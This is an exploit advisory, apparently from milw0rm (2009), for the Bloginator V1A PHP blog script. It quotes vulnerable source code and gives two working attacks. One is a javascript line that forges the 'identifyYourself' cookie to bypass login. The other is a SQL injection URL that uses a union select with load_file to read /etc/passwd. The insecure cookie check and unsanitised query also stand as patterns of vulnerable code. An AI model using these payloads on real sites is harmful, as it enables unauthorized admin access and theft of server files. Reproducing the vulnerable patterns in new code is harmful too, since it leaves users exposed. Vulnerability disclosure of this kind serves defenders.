85 lines
No EOL
2 KiB
Text
85 lines
No EOL
2 KiB
Text
##########################################################################
|
|
|
|
Author = FireShot , Jacopo Vuga.
|
|
Mail = fireshot<at>autistici<dot>org
|
|
|
|
Software = Bloginator V1A
|
|
Download = http://kamads.com/kamads_ads/download.php?email=bloginator&ID=0
|
|
|
|
Greets to = Osirys, Myral, str0ke
|
|
|
|
###########################################################################
|
|
|
|
Vulnerability = Insicure Cookie Handling
|
|
|
|
###########################################################################
|
|
|
|
[CODE]
|
|
|
|
[URL] www.site.com/bloginator/articleCall.php
|
|
|
|
global $name,$password,$returnLink;
|
|
$p_name = strip_tags(substr($_POST['name'],0,32));
|
|
$p_password = strip_tags(substr($_POST['password'],0,32));
|
|
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
|
|
{
|
|
|
|
setcookie("identifyYourself","you are identified");
|
|
print "Login successfull<br>";
|
|
print $returnLink;
|
|
}
|
|
else {print "Wrong username or password";
|
|
}
|
|
}
|
|
|
|
[/CODE]
|
|
|
|
|
|
[EXPLOIT]
|
|
|
|
javascript:document.cookie = "identifyYourself=you+are+identified; path=/";
|
|
|
|
[/EXPLOIT]
|
|
|
|
############################################################################
|
|
|
|
Vulnerability = SQL injection
|
|
|
|
############################################################################
|
|
|
|
[CODE]
|
|
|
|
[URL] www.site.com/bloginator/articleCall.php
|
|
|
|
$action = @$_GET['action'];
|
|
[...]
|
|
$id = $_GET['id'];
|
|
[...]
|
|
function editArticle($id,$message)
|
|
{
|
|
global $returnLink;
|
|
$query = "select * FROM articles WHERE id='$id'";
|
|
$sql = mysql_query($query) or die(mysql_query());
|
|
$title = mysql_result($sql,0,'title');
|
|
$title = htmlentities($title);
|
|
$article = mysql_result($sql,0,'article');
|
|
$article = htmlentities($article);
|
|
$link = mysql_result($sql,0,'link');
|
|
$link = htmlentities($link);
|
|
|
|
startHTML("Edit ID # ".$id);
|
|
?>
|
|
|
|
[/CODE]
|
|
|
|
[EXPLOIT]
|
|
|
|
As Admin (Post Cookie exploit) you can inj arbitrary SQL code in the query.
|
|
|
|
www.site.com/action=edit&id=fireshot' union select 1,2,3,4,load_file('/etc/passwd'),6,7 order by '*
|
|
|
|
[/EXPLOIT]
|
|
|
|
##############################################################################
|
|
|
|
# milw0rm.com [2009-03-19] |